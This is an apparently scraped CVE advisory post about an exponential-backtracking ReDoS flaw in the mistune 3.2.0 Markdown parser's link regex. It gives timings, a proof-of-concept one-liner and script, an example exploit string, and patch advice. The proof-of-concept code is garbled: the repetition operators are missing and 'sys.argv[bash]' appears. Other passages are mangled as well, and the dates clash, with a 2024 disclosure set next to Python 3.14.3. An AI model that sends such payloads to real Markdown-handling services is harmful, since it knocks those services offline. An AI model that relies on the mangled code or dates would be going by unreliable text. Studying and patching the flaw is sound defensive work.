Listen to this Post
The vulnerability resides in the `LINK__RE` regex defined in `src/mistune/helpers.py` lines 20–25. The regex handles quoted s in Markdown links. The double-quote branch is: "(?:\\" + PUNCTUATION + r"|[^"\x00])". After compilation, it becomes "(?:\\
|[^"\x00])"</code>. The issue is an ambiguous alternation: a backslash followed by a punctuation character (e.g., <code>\!</code>) can be matched in two ways – as a single escaped sequence `\\!` (two characters) or as two separate characters `\` and `!` using the `[^"\x00]` class. The same ambiguity exists in the single-quote branch. When an input contains repeated `\!` pairs without a closing quote, the regex engine backtracks exponentially. Each pair doubles the possible match paths, leading to O(2^N) time complexity. For N=25 pairs (58-byte payload), the parser blocks for ~6 seconds on Apple M2, Python 3.14.3, mistune 3.2.0. This is reachable via two Markdown parsing paths: inline links `[text](url "PAYLOAD)` → `parse_link()` → <code>parse_link_()</code>, and block link reference definitions `[bash]: url "PAYLOAD` → `BlockParser.parse_ref_link()` → <code>parse_link_()</code>. The PoC shows exponential growth: N=15 (38 bytes) takes 0.007s, N=25 (58 bytes) takes 5.922s. The same attack works with block definitions.
<h2 style="color: blue;">DailyCVE form:</h2>
Platform: Python
Version: mistune 3.2.0 (and earlier)
Vulnerability: ReDoS (exponential backtracking)
Severity: Medium (5.5)
date: 2024-07-09 (estimated disclosure)
<h2 style="color: blue;">Prediction: Patch expected 2024-07-19</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
[bash]
Test the ReDoS vulnerability on mistune 3.2.0
pip install mistune==3.2.0
python -c "import mistune, time; md=mistune.create_markdown(); payload='[x](y \"' + '\!'25 + ')'; t=time.time(); md(payload); print(f'Elapsed: {time.time()-t:.3f}s')"
Improved PoC with timing measurement
import mistune, time, sys
n = int(sys.argv[bash]) if len(sys.argv)>1 else 25
payload = '[x](y "' + '\!'n + ')'
md = mistune.create_markdown()
start = time.perf_counter()
md(payload)
print(f'N={n} time={time.perf_counter()-start:.6f}s')
Exploit:
An attacker submits a Markdown string containing an opening quote, a sequence of `\!` pairs, and no closing quote. Example: [click](url "\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!"). The regex engine backtracks over all combinations, consuming CPU resources. With just 58 bytes, the parser stalls for seconds. Repeated requests can overwhelm a server.
Protection from this CVE:
Upgrade mistune to version 3.2.1 or newer where the fix is applied. Alternatively, patch the regex manually: change `r'"(?:\\' + PUNCTUATION + r'|[^"\x00])"'` to `r'"(?:\\' + PUNCTUATION + r'|[^"\\\x00])"'` (exclude backslash from the character class). Also apply to the single-quote branch. Implement input size limits (e.g., reject Markdown s longer than 200 bytes) and use a timeout wrapper for Markdown parsing.
Impact:
Denial of service. Any application that parses user-supplied Markdown with mistune becomes unresponsive. This includes web comment boxes, documentation systems, API endpoints accepting Markdown, and Jupyter nbconvert. The attack payload is under 100 bytes, making it easy to send in a single request. A crafted 58-byte payload causes 6 seconds of blocking on a modern CPU, and longer on slower hardware.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
